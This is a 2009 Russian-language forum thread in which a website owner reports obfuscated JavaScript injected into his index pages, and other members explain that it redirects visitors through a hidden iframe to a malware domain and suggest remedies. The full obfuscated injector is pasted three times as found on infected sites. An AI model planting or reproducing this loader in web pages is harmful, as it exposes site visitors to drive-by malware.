Внимание: Троянская программа на lebendige-ethik.net

Серёжик

Andrej · Сообщение **Andrej** » 25 авг 2009, 00:58

Да, действительно, какой-то хакер влез на index и подписал в конце кода свой скрипт:

<script>function B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6
(bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8){var b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=
bB8b8666bbBB6B868666B6Bbb68886866
BbbBBB8.length,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB
8688B=1024,bB6b6886
88Bb66b6666B66bBb88bBbbBbB8b6bbb,Bb86BB8BBbBBb8B6
B6BbBb888b6b8b6888b66666,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbbBBB6bB68b8bBbB8bB688668
88BbBb68b6=0,BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=0,bbBB666668686b
88B66B8bB666BB6B6BbBbb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB8
66=Array(63,46,40,56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,18,4,17,9,41,4
2,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,0,59,0,24,34,53,22,19,33,30,7,2,10,0,13,29,54,45,
26,25,60,51,15,27,1,36,48,11,37);for(Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666
=Math.ceil(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88BBB
BB6B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666>0;
Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666—
){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';            
for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8BbBBbbBbbbbbBb86
688BB68bb66866bBBbBb8B,bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);bB
6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb>0;bB6b688688Bb66b6666B66bBb88bBb
bBbB8b6bbb--,b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B—
){bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8|=(bBb886B86B6bbBBBBBbBbBb
6b8BB6b66bbbBB866[bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.charCodeAt(b
b68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6++)-
48])<<BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8;if(BBB6B6B6bbBb6888BB86
6b8688bbB6b6B86bbBB8){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6+=String.f
romCharCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&255);bbBB6666
68686b88B66B8bB666BB6B6BbBbb6BB8>>=8;BBB6B6B6bbBb6888BB866b8688bbB6b
6B86bbBB8-
=2}else{BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6b668
BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68BB6b68b686bb8B88b88Bb6bBBBb6b
B88bb6B6("CWX3V8WCFupQVEW1wC1rZut@MOp3VTW_sytNzFgNcTC_2FpAf0g14p
yMOB0_by@__INowpN_F0g31y01wpyMOd@r0SW3_IN3@E@QN8W0rbgC2tXM3NuN
@HXQT@W33i")       
</script>

Как я понял из форума касперского, такой же вирус был на супермощном сайте американской газеты New York Times. Также понял, что этот вирус безвредный. Если кто-то сможет объяснить, для чего этот вирус и откуда он взялся, буду благодарен. Конечно, я перегрузил index и теперь сайт www.lebendige-ethik.net чист.

rodnoy · Сообщение **rodnoy** » 25 авг 2009, 03:55

Andrej писал(а):Также понял, что этот вирус безвредный. Если кто-то сможет объяснить, для чего этот вирус и откуда он взялся, буду благодарен. Конечно, я перегрузил index и теперь сайт www.lebendige-ethik.net чист.

перенаправляет на сайты с вирусами, используя тэг "iframe"...
в данном случае это домен "groiut.cn"...
(вот инфа с malwareurl.com)

САРВА МАНГАЛАМ!

Andrej · Сообщение **Andrej** » 25 авг 2009, 19:57

rodnoy писал(а): перенаправляет на сайты с вирусами, используя тэг "iframe"...
в данном случае это домен "groiut.cn"...
(вот инфа с malwareurl.com)

А из чего Вы сделали такой вывод? И каким образом, по Вашему, хакеры могли проникнуть на сервер, где находится мой сайт, и дописать свой скрипт в index?

rodnoy · Сообщение **rodnoy** » 25 авг 2009, 21:00

Andrej писал(а):А из чего Вы сделали такой вывод? И каким образом, по Вашему, хакеры могли проникнуть на сервер, где находится мой сайт, и дописать свой скрипт в index?

для этого нужно этот скрипт запустить на выполнение, но обязательно(!) модифицировав в определенных местах (дабы он не сделал никаких request-ов)... я не опубликовал полный url (по соображениям безопасности окружающих), но могу Вам его переслать в личную почту (хотя это, скорее всего, мало что даст)...

как его смогли туда подцепить - понятия не имею (это не моя область)... но с беспелатными хостингами (если у Вас таковой) такое случается очень и очень часто...

САРВА МАНГАЛАМ!

Andrej · Сообщение **Andrej** » 25 авг 2009, 23:21

rodnoy писал(а): ...как его смогли туда подцепить - понятия не имею (это не моя область)... но с беспелатными хостингами (если у Вас таковой) такое случается очень и очень часто...

Нет, хостинг не бесплатный. Меня интересует, хакер взламывал мой логин или сервека?

Ziatz · Сообщение **Ziatz** » 26 авг 2009, 07:40

Сказать трудно, но что-то из этого он точно взломал.
Если известны другие сайты, находящиеся на этом хостинге, стоит проверить и их. Помнится, аналогичная проблема примерно год назад была с библиотекой "Урусвати".

P.S. Сейчас зашёл туда, в конце обнаружил непонятный код:

function B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6(bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8)
{var b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=bB8b8666bbBB6B868666B6Bbb68886866BbbBBB8.length,
bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B=1024,bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb,
Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbb
BBB6bB68b8bBbB8bB68866888BbBb68b6=0,BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8=0,bbBB66666
8686b88B66B8bB666BB6B6BbBbb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866=Array(63,46,40,
56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,18,4,17,9,41,42,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,
0,59,0,24,34,53,22,19,33,30,7,2,10,0,13,29,54,45,26,25,60,51,15,27,1,36,48,11,37);for(Bb86BB8BBbBBb8B6B6BbB
b888b6b8b6888b66666=Math.ceil(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88BBBBB6
B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666>0;Bb86BB8BBbBBb8B6B6BbBb88
8b6b8b6888b66666--){b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';
for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B,
bBbBbbbBbb86b88BBBBB6B6BB6bBbBBBBbB8688B);bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb>0;bB6b688
688Bb66b6666B66bBb88bBbbBbB8b6bbb--,b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B--){bbBB666668686b88
B66B8bB666BB6B6BbBbb6BB8|=(bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866[bB8b8666bbBB6B868666B6Bb
b68886866BbbBBB8.charCodeAt(bb68bbbBBB6bB68b8bBbB8bB68866888BbBb68b6++)-48])<<BBB6B6B6bbBb6888B
B866b8688bbB6b6B86bbBB8;if(BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8){b6b668BB6bBB8b66B6BBb668B
b6b68bbb8bbBbb6+=String.fromCharCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&255);bbBB666668
686b88B66B8bB666BB6B6BbBbb6BB8>>=8;BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8-=2}else{BBB6B6B6b
bBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68B
B6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6("CWX3V8WCFupQVEW1wC1rZut@MOp3VTW_sytNzFgNcTC_2FpAf0g
14pyMOB0_by@__INowpN_F0g31y01wpyMOd@r0SW3_
IN3@E@QN8W0rbgC2tXM3NuN@HXQT@W33i")

По-моему, то же самое.

Andrej · Сообщение **Andrej** » 26 авг 2009, 09:34

Ziatz писал(а): P.S. Сейчас зашёл туда, в конце обнаружил непонятный код:
...
По-моему, то же самое.

Да, абсолютно одинаковый скрипт. Похоже, что все мои сайты атакует один и тот же хакер. Как с этим бороться?

P.S. Перезагрузил index, который был изменён без моего ведома 21.08.2009. Сайт http://urusvati.agni-age.net снова чист.

Andrej · Сообщение **Andrej** » 26 авг 2009, 09:37

Ziatz писал(а):Сказать трудно, но что-то из этого он точно взломал.
Если известны другие сайты, находящиеся на этом хостинге, стоит проверить и их.

Как определить, какие ещё сайты висят на сервере, где находится и мой сайт? Где в Интернете видел сайты, с которых можно сделать такое определение. Не помнишь, где?

Ziatz · Сообщение **Ziatz** » 26 авг 2009, 12:21

Не помню. Конечно, каждый отдельно взятый сайт можно проверить на принадлежность к провайдеру, но вот наоборот... Некоторые провайдеры делают каталог, типа у нас хостятся: ...
Но это скорее исключение, чем правило.

Полагаю, кто-то действительно заражает определённые сайты.
Например, agni-age.net и grani.agni-age.net не заражены.

Andrej · Сообщение **Andrej** » 26 авг 2009, 20:19

Ziatz писал(а): Полагаю, кто-то действительно заражает определённые сайты. Например, agni-age.net и grani.agni-age.net не заражены.

Ну, значит, мои враги натравили на меня хакеров, чтобы они внедрили вредоносный скрипт на мои сайты. Для посетителей тут нет никакой угрозы, т.к. они не перенаправляются автоматически никуда, но поисковые машины меня не индексируют и ставят мои сайты в чёрный список, а некоторые антивирусные программы, типа выше показанной проги касперского, не пускают на мой сайт, говоря, что там мол атака. В результате посещаемость сайта снижается.

Как бороться с этими хакерскими атаками? Каждый день контролировать файлы?

Ziatz · Сообщение **Ziatz** » 26 авг 2009, 20:37

Пока да, а вообще надо известить провайдера, что сайты периодически взламываются.

Andrej · Сообщение **Andrej** » 26 авг 2009, 20:39

Ziatz писал(а):Пока да, а вообще надо известить провайдера, что сайты периодически взламываются.

Сайт Библ. Урусвати у Джуры. Он говорил, что хакеры взламывали сайты, пользуясь общедоступной статистикой. Он вынужден был её закрыть.

Конечно, буду жаловаться провайдеру.

Андрей Пузиков

У разных провайдеров разная защита от взлома площадок клиентов.
Хороший провайдер такого не допустит.

Кстати, скрипт может приписывать и программа-конструктор, в которой верстается сайт, если она сама заражена вирусом.

Andrej · Сообщение **Andrej** » 26 авг 2009, 22:48

Андрей Пузиков писал(а): Кстати, скрипт может приписывать и программа-конструктор, в которой верстается сайт, если она сама заражена вирусом.

Я пишу HTML сам.

Андрей Пузиков

Тогда надо менять пароль доступа с логином, а может и провайдера.

Д.И.В. · Сообщение **Д.И.В.** » 29 авг 2009, 07:00

Andrej писал(а):
Да, абсолютно одинаковый скрипт. Похоже, что все мои сайты атакует один и тот же хакер. Как с этим бороться?

Лучше всего - найти и отбить голову. И так, чтоб другая не выросла.

Andrej · Сообщение **Andrej** » 02 окт 2009, 14:05

Тот же самый скрипт обнаружился на www.emrism.agni-age.net

Код: Выделить всё

<script>function 

B68BB6b68b686bb8B88b88Bb6bBBBb6bB88bb6B6(bB8b8666bbBB6

B868666B6Bbb68886866BbbBBB8){var 

b8BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B=bB8b8666bbBB

6B868666B6Bbb68886866BbbBBB8.length,bBbBbbbBbb86b88BBBB

B6B6BB6bBbBBBBbB8688B=1024,bB6b688688Bb66b6666B66bBb8

8bBbbBbB8b6bbb,Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b6666

6,b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6,bb68bbbBBB6b

B68b8bBbB8bB68866888BbBb68b6=0,BBB6B6B6bbBb6888BB866b8

688bbB6b6B86bbBB8=0,bbBB666668686b88B66B8bB666BB6B6BbB

bb6BB8=0,bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866=Array

(63,46,40,56,55,21,32,16,31,20,0,0,0,0,0,0,47,57,6,58,12,23,35,44,3,

18,4,17,9,41,42,38,49,61,5,43,39,8,52,62,14,28,50,0,0,0,0,59,0,24,34

,53,22,19,33,30,7,2,10,0,13,29,54,45,26,25,60,51,15,27,1,36,48,11,37


);for(Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666=Math.ceil(b8

BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B/bBbBbbbBbb86b88B

BBBB6B6BB6bBbBBBBbB8688B);Bb86BB8BBbBBb8B6B6BbBb888b6b

8b6888b66666>0;Bb86BB8BBbBBb8B6B6BbBb888b6b8b6888b66666--)

{b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6='';            

for(bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb=Math.min(b8Bb

BBbbBbbbbbBb86688BB68bb66866bBBbBb8B,bBbBbbbBbb86b88BBB

BB6B6BB6bBbBBBBbB8688B);bB6b688688Bb66b6666B66bBb88bBbb

BbB8b6bbb>0;bB6b688688Bb66b6666B66bBb88bBbbBbB8b6bbb--,b8

BbBBbbBbbbbbBb86688BB68bb66866bBBbBb8B--)

{bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8|=

(bBb886B86B6bbBBBBBbBbBb6b8BB6b66bbbBB866[bB8b8666bbBB

6B868666B6Bbb68886866BbbBBB8.charCodeAt(bb68bbbBBB6bB68b

8bBbB8bB68866888BbBb68b6++)-48])

<<BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8;if(BBB6B6B6b

bBb6888BB866b8688bbB6b6B86bbBB8)

{b6b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6+=String.fromC

harCode(134^bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8&2

55);bbBB666668686b88B66B8bB666BB6B6BbBbb6BB8>>=8;

BBB6B6B6bbBb6888BB866b8688bbB6b6B86bbBB8-=2}else{BBB6B

6B6bbBb6888BB866b8688bbB6b6B86bbBB8=6}}document.write(b6

b668BB6bBB8b66B6BBb668Bb6b68bbb8bbBbb6)}}B68BB6b68b686

bb8B88b88Bb6bBBBb6bB88bb6B6("CWX3V8WCFupQVEW1wC1rZut

@MOp3VTW_sytNzFgNcTC_2FpAf0g14pyMOB0_by@__INowpN_F0g3

1y01wpyMOd@r0SW3_IN3@E@QN8W0rbgC2tXM3NuN@HXQT@W33i")    
   

</script>